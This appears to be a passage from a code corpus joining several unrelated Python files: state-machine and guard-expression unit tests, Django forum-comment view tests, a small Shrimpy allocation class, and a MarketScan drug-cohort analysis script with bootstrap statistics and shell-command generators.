        s1_1 = Helpers.TestState(name='S1', is_composite=False)
        s1_2 = Helpers.TestState(name='S1', is_composite=True)
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', is_composite=True)

    def test_merge_line_numbers_from_two_states(self) -> None:
        s1_1 = Helpers.TestState(name='S1', lineno=1)
        s1_2 = Helpers.TestState(name='S1', lineno=2)
        self.assertTrue(s1_1.merge(s1_2))
        self.assertEqual(s1_1.name, 'S1')
        self.assertEqual(s1_1.lineno, [1, 2])

    def test_merge_initial_transition(self) -> None:
        s1_1 = Helpers.TestState(name='S1', lineno=1, initial_transition=InitialTransition(toState='S2'))
        s1_2 = Helpers.TestState(name='S1', lineno=2)
        self.assertTrue(s1_1.merge(s1_2))
        self.assertEqual(s1_1.name, 'S1')
        self.assertEqual(s1_1.lineno, [1, 2])
        self.assertInitialTransition(s1_1.initial_transition, to='S2')

        s2_1 = Helpers.TestState(name='S2', lineno=1)
        s2_2 = Helpers.TestState(name='S2', lineno=2, initial_transition=InitialTransition(toState='S3', action=Action('A1')))
        self.assertTrue(s2_1.merge(s2_2))
        self.assertEqual(s2_1.name, 'S2')
        self.assertEqual(s2_1.lineno, [1, 2])
        self.assertInitialTransition(s2_1.initial_transition, to='S3', action=Action('A1'))

    def test_merge_two_initial_transitions_is_not_possible(self) -> None:
        s1_1 = Helpers.TestState(name='S1', lineno=1, initial_transition=InitialTransition(toState='S2'))
        s1_2 = Helpers.TestState(name='S1', lineno=2, initial_transition=InitialTransition(toState='S3'))
        self.assertFalse(s1_1.merge(s1_2))
    def test_simple_guard(self) -> None:
        g = SimpleGuard('G1', 0)
        self.assertEqual('G1', g.to_string())
        self.assertEqual(1, len(g.guard_conditions()))
        self.assertIn('G1', g.guard_conditions())

    def test_not_guard(self) -> None:
        g = NotGuard(Helpers.TestGuard('G1'))
        self.assertEqual('!G1', g.to_string())
        self.assertEqual(1, len(g.guard_conditions()))
        self.assertIn('G1', g.guard_conditions())

    def test_simplify_not_guard_1(self) -> None:
        g = NotGuard(NotGuard(Helpers.TestGuard('G1')))
        self.assertEqual('G1', g.to_string())
        self.assertEqual(1, len(g.guard_conditions()))
        self.assertIn('G1', g.guard_conditions())

    def test_simplify_not_guard_2(self) -> None:
        g = NotGuard(NotGuard(NotGuard(Helpers.TestGuard('G1'))))
        self.assertEqual('!G1', g.to_string())
        self.assertEqual(1, len(g.guard_conditions()))
        self.assertIn('G1', g.guard_conditions())

    def test_and_guard(self) -> None:
        g = AndGuard(Helpers.TestGuard('G1'), Helpers.TestGuard('G2'))
        self.assertEqual('(G1 && G2)', g.to_string())
        self.assertEqual(2, len(g.guard_conditions()))
        self.assertIn('G1', g.guard_conditions())
        self.assertIn('G2', g.guard_conditions())

    def test_or_guard(self) -> None:
        g = OrGuard(Helpers.TestGuard('G1'), Helpers.TestGuard('G2'))
        self.assertEqual('(G1 || G2)', g.to_string())
        self.assertEqual(2, len(g.guard_conditions()))
        self.assertIn('G1', g.guard_conditions())
        self.assertIn('G2', g.guard_conditions())

    def test_complex_guard(self) -> None:
        g = OrGuard(Helpers.TestGuard('G1'), NotGuard(AndGuard(OrGuard(Helpers.TestGuard('G2'), Helpers.TestGuard('G3')), NotGuard(Helpers.TestGuard('G4')))))
        self.assertEqual('(G1 || !((G2 || G3) && !G4))', g.to_string())
        self.assertEqual(4, len(g.guard_conditions()))
        self.assertIn('G1', g.guard_conditions())
        self.assertIn('G2', g.guard_conditions())
        self.assertIn('G3', g.guard_conditions())
        self.assertIn('G4', g.guard_conditions())

    def test_guards_can_appear_in_complex_expression_more_than_once(self) -> None:
        g = OrGuard(Helpers.TestGuard('G1'), Helpers.TestGuard('G1'))
        self.assertEqual('(G1 || G1)', g.to_string())
        self.assertEqual(1, len(g.guard_conditions()))
        self.assertIn('G1', g.guard_conditions())

    def test_evaluate_simple_guard(self) -> None:
        g = SimpleGuard('G1', 0)
        self.assertFalse(g.evaluate(0))
        self.assertTrue(g.evaluate(1))

    def test_evaluate_not_guard(self) -> None:
        g = NotGuard(Helpers.TestGuard('G1'))
        self.assertTrue(g.evaluate(0))
        self.assertFalse(g.evaluate(1))

    def test_evaluate_and_guard(self) -> None:
        g = AndGuard(Helpers.TestGuard('G1'), Helpers.TestGuard('G2'))
        self.assertFalse(g.evaluate(0))
        self.assertFalse(g.evaluate(1))
        self.assertFalse(g.evaluate(2))
        self.assertTrue(g.evaluate(3))

    def test_evaluate_or_guard(self) -> None:
        g = OrGuard(Helpers.TestGuard('G1'), Helpers.TestGuard('G2'))
        self.assertFalse(g.evaluate(0))
        self.assertTrue(g.evaluate(1))
        self.assertTrue(g.evaluate(2))
        self.assertTrue(g.evaluate(3))

    def test_evaluate_complex_guard(self) -> None:
        # (!G1 || ((!G2 || G3) && G1))
        g = OrGuard(NotGuard(Helpers.TestGuard('G1')), AndGuard(OrGuard(NotGuard(Helpers.TestGuard('G2')), Helpers.TestGuard('G3')), Helpers.TestGuard('G1')))
        self.assertTrue(g.evaluate(0))
        self.assertTrue(g.evaluate(1))
        self.assertTrue(g.evaluate(2))
        self.assertFalse(g.evaluate(3))
        self.assertTrue(g.evaluate(4))
        self.assertTrue(g.evaluate(5))
        self.assertTrue(g.evaluate(6))
        self.assertTrue(g.evaluate(7))

    def test_evaluate_guard_with_custom_bit_index(self) -> None:
        g = Helpers.TestGuard('G1')
        bit_index = {'G1': 5}
        for i in range(0, 31):
            self.assertFalse(g.evaluate(i, bit_index))
        self.assertTrue(g.evaluate(32, bit_index))

    def test_guard_lineno(self) -> None:
        g1 = SimpleGuard('G1', 1234)
        g2 = SimpleGuard('G2', 4321)
        self.assertEqual(1234, g1.lineno())
        self.assertEqual(1234, NotGuard(g1).lineno())
        self.assertEqual(1234, OrGuard(g1, g2).lineno())
        self.assertEqual(4321, OrGuard(g2, g1).lineno())
        self.assertEqual(1234, AndGuard(g1, g2).lineno())
        self.assertEqual(4321, AndGuard(g2, g1).lineno())
    def test_all_events_of_state(self) -> None:
        it1 = InternalTransition(event='E1', action=Action('A1'))
        it2 = InternalTransition(event='E2', action=Action('A2'))
        st1 = StateTransition(event='E3', toState='S2')
        st2 = StateTransition(event='E4', toState='S2')
        st3 = StateTransition(event='E4', toState='S3')
        s = State(name='S', lineno=0, internal_transitions=[it1, it2], state_transitions=[st1, st2, st3])
        self.assertEqual(4, len(s.events()))
        self.assertIn('E1', s.events())
        self.assertIn('E2', s.events())
        self.assertIn('E3', s.events())
        self.assertIn('E4', s.events())

    def test_all_guard_conditions_for_event(self) -> None:
        it1 = InternalTransition(event='E2', action=Action('A2'), guard=Helpers.TestGuard('G1'))
        st1 = StateTransition(event='E2', toState='S2', guard=AndGuard(NotGuard(Helpers.TestGuard('G1')), Helpers.TestGuard('G2')))
        s = State(name='S', lineno=0, internal_transitions=[it1], state_transitions=[st1])
        self.assertEqual(0, len(s.guard_conditions_for_event('E1')))
        self.assertEqual(2, len(s.guard_conditions_for_event('E2')))
        self.assertIn('G1', s.guard_conditions_for_event('E2'))
        self.assertIn('G2', s.guard_conditions_for_event('E2'))

    def test_all_internal_transitions_for_event(self) -> None:
        it1 = InternalTransition(event='E1', action=Action('A1'))
        it2 = InternalTransition(event='E2', action=Action('A2'))
        st1 = StateTransition(event='E1', toState='S2')
        st2 = StateTransition(event='E4', toState='S2')
        st3 = StateTransition(event='E4', toState='S3')
        s = State(name='S', lineno=0, internal_transitions=[it1, it2], state_transitions=[st1, st2, st3])
        self.assertEqual(1, len(s.internal_transitions_for_event('E1')))
        it = s.internal_transitions_for_event('E1')

    def test_all_state_transitions_for_event(self) -> None:
        it1 = InternalTransition(event='E1', action=Action('A1'))
        it2 = InternalTransition(event='E2', action=Action('A2'))
        st1 = StateTransition(event='E1', toState='S2')
        st2 = StateTransition(event='E4', toState='S2')
        st3 = StateTransition(event='E4', toState='S3')
        s = State(name='S', lineno=0, internal_transitions=[it1, it2], state_transitions=[st1, st2, st3])
        self.assertEqual(1, len(s.state_transitions_for_event('E1')))
        st = s.state_transitions_for_event('E1')

    def test_action_prototype_and_invocation_strings(self) -> None:
        a1 = Action(name='A1', type=ActionType.INT, value='10')
        a2 = Action(name='A2', type=ActionType.FLOAT, value='12.34')
        a3 = Action(name='A3', type=ActionType.BOOL, value='true')
        a4 = Action(name='A4', type=ActionType.STRING, value='"Test123"')
        a5 = Action(name='A5')
        self.assertEqual('void A1(int i)', a1.prototype_string())
        self.assertEqual('A1(10)', a1.invocation_string())
        self.assertEqual('void A2(float f)', a2.prototype_string())
        self.assertEqual('A2(12.34f)', a2.invocation_string())
        self.assertEqual('void A3(bool b)', a3.prototype_string())
        self.assertEqual('A3(true)', a3.invocation_string())
        self.assertEqual('void A4(const char* s)', a4.prototype_string())
        self.assertEqual('A4("Test123")', a4.invocation_string())
        self.assertEqual('void A5()', a5.prototype_string())
        self.assertEqual('A5()', a5.invocation_string())


if __name__ == '__main__':
    unittest.main(verbosity=2)
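The `evaluate(value)` calls above pass a plain integer whose bits encode the truth of each guard condition: judging by the expected results, `G1` sits at bit 0, `G2` at bit 1, and so on, with `bit_index` overriding the default position. A standalone sketch of that encoding, independent of the FloHsm classes (the helper name `guard_bit` is illustrative, not part of the library):

```python
def guard_bit(value, index):
    """True if bit `index` is set in the integer encoding."""
    return bool(value & (1 << index))

# value 3 == 0b11 sets both G1 (bit 0) and G2 (bit 1),
# mirroring AndGuard(G1, G2).evaluate(3) being True above
g1 = guard_bit(3, 0)
g2 = guard_bit(3, 1)
and_result = g1 and g2

# value 1 sets only G1, so OrGuard(G1, G2).evaluate(1) is True
or_result = guard_bit(1, 0) or guard_bit(1, 1)

# a custom bit index {'G1': 5} means G1 only becomes True at value 32
custom = guard_bit(32, 5)
```

This explains `test_evaluate_guard_with_custom_bit_index`: every value below 32 leaves bit 5 clear, so the guard stays False.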
# BookClub/tests/views/forum_views/test_create_forum_comment.py (amir-rahim/BookClubSocialNetwork, MIT)
"""Unit testing for Create Forum Comment view"""
from django.contrib import messages
from django.contrib.messages import get_messages
from django.test import TestCase, tag
from django.urls import reverse
from BookClub.models import User, ForumPost, Club, ForumComment
from BookClub.tests.helpers import reverse_with_next
@tag('views', 'forum', 'create_comment')
class CreateCommentViewTestCase(TestCase):
    """Tests of the Create Comments view."""

    fixtures = [
        'BookClub/tests/fixtures/default_users.json',
        'BookClub/tests/fixtures/default_clubs.json',
        'BookClub/tests/fixtures/default_memberships.json',
        'BookClub/tests/fixtures/default_forum.json',
        'BookClub/tests/fixtures/default_posts.json',
    ]

    def setUp(self):
        self.club = Club.objects.get(pk=1)
        self.user = User.objects.get(username="johndoe")
        self.global_post = ForumPost.objects.get(pk=1)
        self.url = reverse('create_forum_comment', kwargs={
            "post_id": self.global_post.pk
        })
        self.club_post = ForumPost.objects.get(pk=4)
        self.club_url = reverse('create_forum_comment', kwargs={
            "club_url_name": self.club.club_url_name,
            "post_id": self.club_post.pk
        })
        self.post = {
            "content": "HELLO, HOW DO YOU DO!",
        }

    def test_create_comment_url(self):
        self.client.login(username=self.user.username, password="Password123")
        self.assertEqual(self.url, '/forum/' + str(self.global_post.pk) + '/comment/')

    def test_create_club_comment_url(self):
        self.client.login(username=self.user.username, password="Password123")
        self.assertEqual(self.club_url, '/club/' + str(self.club.club_url_name) + '/forum/' + str(self.club_post.pk) + '/comment/')

    def test_redirect_when_not_logged_in(self):
        redirect_url = reverse_with_next('login', self.url)
        response = self.client.post(self.url, self.post, follow=True)
        self.assertRedirects(response, redirect_url,
                             status_code=302, target_status_code=200,
                             fetch_redirect_response=True)

    def test_redirect_club_when_not_logged_in(self):
        redirect_url = reverse_with_next('login', self.club_url)
        response = self.client.post(self.club_url, self.post, follow=True)
        self.assertRedirects(response, redirect_url,
                             status_code=302, target_status_code=200,
                             fetch_redirect_response=True)

    def test_create_post_when_not_logged_in(self):
        post_count_before = ForumComment.objects.count()
        redirect_url = reverse_with_next('login', self.url)
        response = self.client.post(self.url, self.post, follow=True)
        self.assertRedirects(response, redirect_url,
                             status_code=302, target_status_code=200,
                             fetch_redirect_response=True)
        self.assertTemplateUsed(response, 'authentication/login.html')
        post_count_after = ForumComment.objects.count()
        self.assertEqual(post_count_after, post_count_before)

    def test_create_club_comment_when_not_logged_in(self):
        post_count_before = ForumComment.objects.count()
        redirect_url = reverse_with_next('login', self.club_url)
        response = self.client.post(self.club_url, self.post, follow=True)
        self.assertRedirects(response, redirect_url,
                             status_code=302, target_status_code=200,
                             fetch_redirect_response=True)
        self.assertTemplateUsed(response, 'authentication/login.html')
        post_count_after = ForumComment.objects.count()
        self.assertEqual(post_count_after, post_count_before)

    def test_create_comment_when_logged_in(self):
        self.client.login(username=self.user.username, password="Password123")
        redirect_url = reverse('forum_post', kwargs={"post_id": self.global_post.pk})
        post_count_before = ForumComment.objects.count()
        response = self.client.post(self.url, self.post, follow=True)
        self.assertRedirects(response, redirect_url,
                             status_code=302, target_status_code=200,
                             fetch_redirect_response=True)
        post_count_after = ForumComment.objects.count()
        self.assertEqual(post_count_after, post_count_before + 1)

    def test_create_club_comment_when_logged_in(self):
        self.client.login(username=self.user.username, password="Password123")
        redirect_url = reverse('forum_post', kwargs={"club_url_name": self.club.club_url_name, "post_id": self.club_post.pk})
        post_count_before = ForumComment.objects.count()
        response = self.client.post(self.club_url, self.post, follow=True)
        self.assertRedirects(response, redirect_url,
                             status_code=302, target_status_code=200,
                             fetch_redirect_response=True)
        post_count_after = ForumComment.objects.count()
        self.assertEqual(post_count_after, post_count_before + 1)

    def test_create_invalid_comment(self):
        self.client.login(username=self.user.username, password="Password123")
        redirect_url = reverse('forum_post', kwargs={"post_id": self.global_post.pk})
        post_count_before = ForumComment.objects.count()
        self.post['content'] = "x" * 1025
        response = self.client.post(self.url, self.post, follow=True)
        self.assertRedirects(response, redirect_url,
                             status_code=302, target_status_code=200,
                             fetch_redirect_response=True)
        messages_list = list(get_messages(response.wsgi_request))
        self.assertEqual(len(messages_list), 1)
        self.assertEqual(messages_list[0].level, messages.ERROR)
        self.assertEqual(str(messages_list[0]), "There was an error making that comment, try again!")
        post_count_after = ForumComment.objects.count()
        self.assertEqual(post_count_after, post_count_before)

    def test_create_invalid_post_id(self):
        self.client.login(username=self.user.username, password="Password123")
        redirect_url = reverse('forum_post', kwargs={"post_id": 1000})
        self.url = reverse('create_forum_comment', kwargs={
            "post_id": 1000
        })
        post_count_before = ForumComment.objects.count()
        response = self.client.post(self.url, self.post, follow=True)
        self.assertRedirects(response, redirect_url,
                             status_code=302, target_status_code=404,
                             fetch_redirect_response=True)
        messages_list = list(get_messages(response.wsgi_request))
        self.assertEqual(len(messages_list), 1)
        self.assertEqual(messages_list[0].level, messages.ERROR)
        self.assertEqual(str(messages_list[0]), "There was an error making that comment, try again!")
        post_count_after = ForumComment.objects.count()
        self.assertEqual(post_count_after, post_count_before)
0d647df4440aabf6ed9a5fa9badebc4db34e8bf6 | 255 | py | Python | shrimpy/allocation.py | cwm9cwm9/shrimpy-python | 8edabbf1c06a29e73d9bf0a30db82bf48d9ef2a5 | [
"MIT"
] | 128 | 2019-07-10T06:31:54.000Z | 2022-03-06T04:25:39.000Z | shrimpy/allocation.py | johnjdailey/shrimpy-python | 10a942b14dd88102564460d60c25cc10123fc448 | [
"MIT"
] | 16 | 2020-04-29T12:31:18.000Z | 2021-12-03T03:33:31.000Z | shrimpy/allocation.py | johnjdailey/shrimpy-python | 10a942b14dd88102564460d60c25cc10123fc448 | [
"MIT"
] | 41 | 2019-10-29T20:51:22.000Z | 2022-03-14T03:44:11.000Z | class Allocation():
    def __init__(self, symbol, percent):
        self.symbol = symbol
        self.percent = percent

    def get_api_format(self):
        return {
            'symbol': self.symbol,
            'percent': self.percent
        }
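`get_api_format` simply mirrors the constructor arguments into the dict shape a portfolio allocation request expects. A standalone usage sketch (the class is repeated inline so the snippet runs on its own; the BTC/ETH split is a made-up example, not taken from the Shrimpy docs):

```python
class Allocation:
    def __init__(self, symbol, percent):
        self.symbol = symbol
        self.percent = percent

    def get_api_format(self):
        # serialize to the {'symbol': ..., 'percent': ...} dict the API expects
        return {'symbol': self.symbol, 'percent': self.percent}

# hypothetical 60/40 portfolio split
payload = [Allocation('BTC', 0.6).get_api_format(),
           Allocation('ETH', 0.4).get_api_format()]
```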
# block/__init__.py (bbatalo/block, MIT)
from .block import *
21ab1e9663a221f03b2825948d206ebbd65be39b | 201 | py | Python | sppas/sppas/src/dependencies/grako/test/__main__.py | mirfan899/MTTS | 3167b65f576abcc27a8767d24c274a04712bd948 | [
"MIT"
] | null | null | null | sppas/sppas/src/dependencies/grako/test/__main__.py | mirfan899/MTTS | 3167b65f576abcc27a8767d24c274a04712bd948 | [
"MIT"
] | null | null | null | sppas/sppas/src/dependencies/grako/test/__main__.py | mirfan899/MTTS | 3167b65f576abcc27a8767d24c274a04712bd948 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import dependencies.grako.test
if __name__ == '__main__':
    dependencies.grako.test.main()
| 28.714286 | 82 | 0.761194 | 24 | 201 | 5.75 | 0.75 | 0.246377 | 0.304348 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00565 | 0.119403 | 201 | 6 | 83 | 33.5 | 0.774011 | 0.104478 | 0 | 0 | 0 | 0 | 0.044944 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.25 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
df16b4a8e57177e2e18f17c537ba9b44cd2f035e | 91,881 | py | Python | iptw/misc_marketscan.py | calvin-zcx/RWD4Drug | a316bff7cbc22654071dbe4da20cf12a7dd33d00 | [
"MIT"
] | 1 | 2021-07-07T19:47:12.000Z | 2021-07-07T19:47:12.000Z | iptw/misc_marketscan.py | calvin-zcx/RWD4Drug | a316bff7cbc22654071dbe4da20cf12a7dd33d00 | [
"MIT"
] | null | null | null | iptw/misc_marketscan.py | calvin-zcx/RWD4Drug | a316bff7cbc22654071dbe4da20cf12a7dd33d00 | [
"MIT"
] | null | null | null | import os
import shutil
import zipfile
import torch
import torch.utils.data
from dataset import *
import pickle
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import matplotlib.ticker as tck
import numpy as np
import csv
from collections import Counter, defaultdict
import pandas as pd
from utils import check_and_mkdir
from scipy import stats
import re
import itertools
import functools
import random
import seaborn as sns
print = functools.partial(print, flush=True)
MAX_NO_UNBALANCED_FEATURE = 0
MIN_SUCCESS_RATE = 0.5 # 0.1
MIN_SUPPORT = MIN_SUCCESS_RATE * 100
# 5
# 5
print('Global MAX_NO_UNBALANCED_FEATURE: ', MAX_NO_UNBALANCED_FEATURE)
np.random.seed(0)
random.seed(0)
def IQR(s):
    return [np.quantile(s, .5), np.quantile(s, .25), np.quantile(s, .75)]


def stringlist_2_list(s):
    r = s.strip('][').replace(',', ' ').split()
    r = list(map(float, r))
    return r
def stringlist_2_str(s, percent=False, digit=-1):
r = s.strip('][').replace(',', ' ').split()
r = list(map(float, r))
if percent:
r = [x * 100 for x in r]
if digit == 0:
rr = ','.join(['{:.0f}'.format(x) for x in r])
elif digit == 1:
rr = ','.join(['{:.1f}'.format(x) for x in r])
elif digit == 2:
rr = ','.join(['{:.2f}'.format(x) for x in r])
elif digit == 3:
rr = ','.join(['{:.1f}'.format(x) for x in r])
else:
rr = ','.join(['{}'.format(x) for x in r])
return rr
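The two bracket-string parsers above recover Python lists from serialized strings such as '[0.1, 0.25]'. A minimal standalone sketch of the same parsing logic (restated under a hypothetical name, `parse_stringlist`, so it runs on its own without shadowing the helpers above):

```python
# Standalone restatement of the stringlist_2_list parsing logic:
# strip the surrounding brackets, normalize commas to spaces, map to float.
def parse_stringlist(s):
    return [float(x) for x in s.strip('][').replace(',', ' ').split()]

print(parse_stringlist('[0.1, 0.25, 0.5]'))  # [0.1, 0.25, 0.5]
```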
def boot_matrix(z, B):
"""Bootstrap sample
Returns all bootstrap samples in a matrix"""
z = np.array(z).flatten()
n = len(z) # sample size
    idz = np.random.randint(0, n, size=(B, n))  # indices to pick for all bootstrap samples
return z[idz]
def bootstrap_mean_ci(x, B=1000, alpha=0.05):
n = len(x)
    # Generate bootstrap distribution of the sample mean
xboot = boot_matrix(x, B=B)
sampling_distribution = xboot.mean(axis=1)
quantile_confidence_interval = np.percentile(sampling_distribution, q=(100 * alpha / 2, 100 * (1 - alpha / 2)))
std = sampling_distribution.std()
# if plot:
# plt.hist(sampling_distribution, bins="fd")
return quantile_confidence_interval, std
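A self-contained sanity check of the percentile-bootstrap CI computed by bootstrap_mean_ci above, on synthetic data (same steps, re-implemented inline: resample rows, take row means, read off the alpha/2 and 1-alpha/2 percentiles):

```python
# Percentile-bootstrap CI for a sample mean, as a standalone sketch.
import numpy as np

rng = np.random.default_rng(0)
x = rng.normal(loc=2.0, scale=1.0, size=500)
B, alpha = 1000, 0.05
idx = rng.integers(0, len(x), size=(B, len(x)))  # bootstrap index matrix
boot_means = x[idx].mean(axis=1)                 # sampling distribution of the mean
lo, hi = np.percentile(boot_means, [100 * alpha / 2, 100 * (1 - alpha / 2)])
print(lo < x.mean() < hi)  # the sample mean sits inside its own bootstrap CI
```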
def bootstrap_mean_pvalue(x, expected_mean=0., B=1000):
"""
Ref:
1. https://en.wikipedia.org/wiki/Bootstrapping_(statistics)#cite_note-:0-1
2. https://www.tau.ac.il/~saharon/StatisticsSeminar_files/Hypothesis.pdf
3. https://github.com/mayer79/Bootstrap-p-values/blob/master/Bootstrap%20p%20values.ipynb
4. https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.ttest_1samp.html?highlight=one%20sample%20ttest
    Bootstrap p-value for a one-sample t-test.
    Returns the bootstrap p-value and the parametric test result (statistic, p-value)."""
n = len(x)
orig = stats.ttest_1samp(x, expected_mean)
    # Generate bootstrap distribution of the sample mean
x_boots = boot_matrix(x - x.mean() + expected_mean, B=B)
x_boots_mean = x_boots.mean(axis=1)
t_boots = (x_boots_mean - expected_mean) / (x_boots.std(axis=1, ddof=1) / np.sqrt(n))
p = np.mean(t_boots >= orig[0])
p_final = 2 * min(p, 1 - p)
# Plot bootstrap distribution
# if plot:
# plt.figure()
# plt.hist(x_boots_mean, bins="fd")
return p_final, orig
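The key step in bootstrap_mean_pvalue above is the null-centering of the sample: shifting the data so its mean equals the hypothesized mean makes every resample a draw under H0. A standalone illustration of just that step:

```python
# Null-centering: after the shift, the sample mean equals expected_mean exactly,
# so bootstrap t statistics are generated under the null hypothesis.
import numpy as np

rng = np.random.default_rng(2)
x = rng.normal(5.0, 2.0, size=300)
expected_mean = 4.0
shifted = x - x.mean() + expected_mean
print(np.isclose(shifted.mean(), expected_mean))  # True
```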
def bootstrap_mean_pvalue_2samples(x, y, equal_var=False, B=1000):
"""
Bootstrap hypothesis testing for comparing the means of two independent samples
Ref:
1. https://en.wikipedia.org/wiki/Bootstrapping_(statistics)#cite_note-:0-1
2. https://www.tau.ac.il/~saharon/StatisticsSeminar_files/Hypothesis.pdf
3. https://github.com/mayer79/Bootstrap-p-values/blob/master/Bootstrap%20p%20values.ipynb
4. https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.ttest_1samp.html?highlight=one%20sample%20ttest
    Bootstrap p-value for comparing two sample means.
    Returns the bootstrap p-value and the parametric test result (statistic, p-value)."""
n = len(x)
orig = stats.ttest_ind(x, y, equal_var=equal_var)
pooled_mean = np.concatenate((x, y), axis=None).mean()
xboot = boot_matrix(x - x.mean() + pooled_mean,
B=B) # important centering step to get sampling distribution under the null
yboot = boot_matrix(y - y.mean() + pooled_mean, B=B)
sampling_distribution = stats.ttest_ind(xboot, yboot, axis=1, equal_var=equal_var)[0]
if np.isnan(orig[1]):
p_final = np.nan
else:
# Calculate proportion of bootstrap samples with at least as strong evidence against null
p = np.mean(sampling_distribution >= orig[0])
# RESULTS
# print("p value for null hypothesis of equal population means:")
# print("Parametric:", orig[1])
# print("Bootstrap:", 2 * min(p, 1 - p))
p_final = 2 * min(p, 1 - p)
return p_final, orig
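bootstrap_mean_pvalue_2samples relies on the pooled-mean centering noted in its inline comment: both samples are shifted to share the pooled mean, so the resampled t statistics are drawn under H0 of equal population means. A standalone illustration of that centering:

```python
# Pooled-mean centering for the two-sample bootstrap test above.
import numpy as np

rng = np.random.default_rng(1)
x = rng.normal(0.0, 1.0, size=200)
y = rng.normal(0.5, 1.0, size=200)
pooled_mean = np.concatenate((x, y)).mean()
xc = x - x.mean() + pooled_mean
yc = y - y.mean() + pooled_mean
# both centered samples now have exactly the pooled mean
print(np.isclose(xc.mean(), pooled_mean) and np.isclose(yc.mean(), pooled_mean))  # True
```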
def shell_for_ml(cohort_dir_name, model, niter=50, min_patients=500, stats=True, more_para=''):
cohort_size = pickle.load(open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
fo = open('shell_{}_{}.sh'.format(model, cohort_dir_name), 'w') # 'a'
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
# load others:
df = pd.read_excel(r'../data/repurposed_AD_under_trials_20200227.xlsx', dtype=str)
added_drug = []
for index, row in df.iterrows():
rx = row['rxcui']
gpi = row['gpi']
if pd.notna(rx):
rx = [x + '.pkl' for x in re.split('[,;+]', rx)]
added_drug.extend(rx)
if pd.notna(gpi):
gpi = [x + '.pkl' for x in re.split('[,;+]', gpi)]
added_drug.extend(gpi)
print('len(added_drug): ', len(added_drug))
print(added_drug)
fo.write('mkdir -p output_marketscan/{}/{}/log\n'.format(cohort_dir_name, model))
n = 0
for x in name_cnt:
k, v = x
if (v >= min_patients) or (k in added_drug):
drug = k.split('.')[0]
for ctrl_type in ['random', 'atc']:
for seed in range(0, niter):
cmd = "python main.py --data_dir ../ipreprocess/output_marketscan/{}/ --treated_drug {} " \
"--controlled_drug {} --run_model {} --output_marketscan_dir output_marketscan/{}/{}/ --random_seed {} " \
"--drug_coding rxnorm --med_code_topk 200 {} {} " \
"2>&1 | tee output_marketscan/{}/{}/log/{}_S{}D200C{}_{}.log\n".format(
cohort_dir_name, drug,
ctrl_type, model, cohort_dir_name, model, seed, '--stats' if stats else '', more_para,
cohort_dir_name, model, drug, seed, ctrl_type, model)
fo.write(cmd)
n += 1
fo.close()
print('In total ', n, ' commands')
def shell_for_ml_marketscan(cohort_dir_name, model, niter=50, min_patients=500, stats=True, more_para='', selected=False):
if not selected:
cohort_size = pickle.load(
open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
else:
d = pd.read_excel(r'../iptw/output_marketscan/{}/selected_drug_list.xlsx'.format(cohort_dir_name),
dtype={'drug':str})
name_cnt = []
for index, row in d.iterrows():
drug = row['drug']
n = row['n_treat']
name_cnt.append([drug, n])
fo = open('shell_{}_{}_marketscan.sh'.format(model, cohort_dir_name), 'w') # 'a'
fo.write('mkdir -p output_marketscan/{}/{}/log\n'.format(cohort_dir_name, model))
n_cmd = n_drug = 0
for x in name_cnt:
k, v = x
if (v >= min_patients):
drug = k.split('.')[0]
n_drug += 1
for ctrl_type in ['random', 'atc']:
for seed in range(0, niter):
cmd = "python main.py --data_dir ../ipreprocess/output_marketscan/{}/ --treated_drug {} " \
"--controlled_drug {} --run_model {} --output_dir output_marketscan/{}/{}/ --random_seed {} " \
"--drug_coding gpi --med_code_topk 200 {} {} " \
"2>&1 | tee output_marketscan/{}/{}/log/{}_S{}D200C{}_{}.log\n".format(
cohort_dir_name, drug,
ctrl_type, model, cohort_dir_name, model, seed, '--stats' if stats else '', more_para,
cohort_dir_name, model, drug, seed, ctrl_type, model)
fo.write(cmd)
n_cmd += 1
fo.close()
    print('In total ', n_drug, ' drugs ', n_cmd, ' commands')
def shell_for_ml_marketscan_stats_exist(cohort_dir_name, model, niter=10, min_patients=500):
cohort_size = pickle.load(
open(r'../ipreprocess/output_marketscan/{}/cohorts_size.pkl'.format(cohort_dir_name), 'rb'))
fo = open('shell_{}_{}_marketscan_stats_exist.sh'.format(model, cohort_dir_name), 'w') # 'a'
name_cnt = sorted(cohort_size.items(), key=lambda x: x[1], reverse=True)
# load others:
df = pd.read_excel(r'../data/repurposed_AD_under_trials_20200227.xlsx', dtype=str)
added_drug = []
for index, row in df.iterrows():
rx = row['rxcui']
gpi = row['gpi']
if pd.notna(rx):
rx = [x + '.pkl' for x in re.split('[,;+]', rx)]
added_drug.extend(rx)
if pd.notna(gpi):
gpi = [x + '.pkl' for x in re.split('[,;+]', gpi)]
added_drug.extend(gpi)
print('len(added_drug): ', len(added_drug))
print(added_drug)
fo.write('mkdir -p output_marketscan/{}/{}/log_stats_exit\n'.format(cohort_dir_name, model))
n = 0
for x in name_cnt:
k, v = x
if (v >= min_patients) or (k in added_drug):
drug = k.split('.')[0]
for ctrl_type in ['random', 'atc']:
for seed in range(0, niter):
cmd = "python main.py --data_dir ../ipreprocess/output_marketscan/{}/ --treated_drug {} " \
"--controlled_drug {} --run_model {} --output_dir output_marketscan/{}/{}/ --random_seed {} " \
"--drug_coding gpi --med_code_topk 200 --stats --stats_exit " \
"2>&1 | tee output_marketscan/{}/{}/log_stats_exit/{}_S{}D200C{}_{}.log\n".format(
cohort_dir_name, drug,
ctrl_type, model, cohort_dir_name, model, seed,
cohort_dir_name, model, drug, seed, ctrl_type, model)
fo.write(cmd)
n += 1
fo.close()
print('In total ', n, ' commands')
